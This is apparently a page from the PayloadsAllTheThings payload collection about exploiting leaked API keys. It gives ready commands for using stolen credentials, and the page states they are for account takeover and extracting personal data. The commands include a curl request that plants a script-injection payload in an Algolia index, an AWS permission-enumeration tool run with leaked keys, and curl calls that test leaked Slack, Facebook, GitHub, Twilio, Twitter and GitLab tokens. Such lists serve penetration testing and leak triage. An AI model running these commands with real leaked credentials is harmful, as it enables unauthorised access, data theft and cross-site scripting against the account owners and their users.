PayloadsAllTheThings/API Key Leaks
2019-12-17 21:59:19 +05:30
..
README.md Fixed Broken Links in API Key Leaks 2019-12-17 21:59:19 +05:30

API Key Leaks

The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares.

Summary

Tools

Exploit

The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.

Algolia

curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'

AWS Access Key ID & Secret

git clone https://github.com/andresriancho/enumerate-iam
cd enumerate-iam
./enumerate-iam.py --access-key AKIA... --secret-key XXX..

Slack API Token

curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"

Facebook Access Token

curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2

Github client id and client secret

curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'

Twilio Account_sid and Auth token

curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN

Twitter API Secret

curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'

Twitter Bearer Token

curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'

Gitlab Personal Access Token

curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"

References